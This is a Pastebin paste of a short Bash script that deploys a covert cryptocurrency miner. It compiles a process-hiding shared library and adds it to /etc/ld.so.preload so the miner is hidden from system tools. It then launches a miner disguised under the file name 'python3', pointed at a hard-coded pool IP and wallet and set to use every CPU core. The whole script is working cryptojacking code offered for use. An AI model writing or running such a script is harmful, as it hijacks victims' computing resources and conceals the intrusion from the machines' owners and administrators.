Advertisement
ppek

AltTDC

Feb 10th, 2023 (edited)
131
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 0.40 KB | None | 0 0
  1. POOLNH="47.254.18.74:80"
  2. WALLETNH="TNZVz8TBxF8cRmo1gwRhDA3Nm7jzazcGjK"
  3. echo "++ BISSMILLAHIRAHMANNIRAHIM ++"
  4. sleep 2
  5.  
  6. make
  7. gcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldl
  8. mv libprocesshider.so /usr/local/lib/
  9. echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload
  10. sleep 2
  11. ./python3 --algo yespowertide -o stratum+tcp://$POOLNH --user $WALLETNH.Aponk -p x -t$(nproc --all)
  12.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement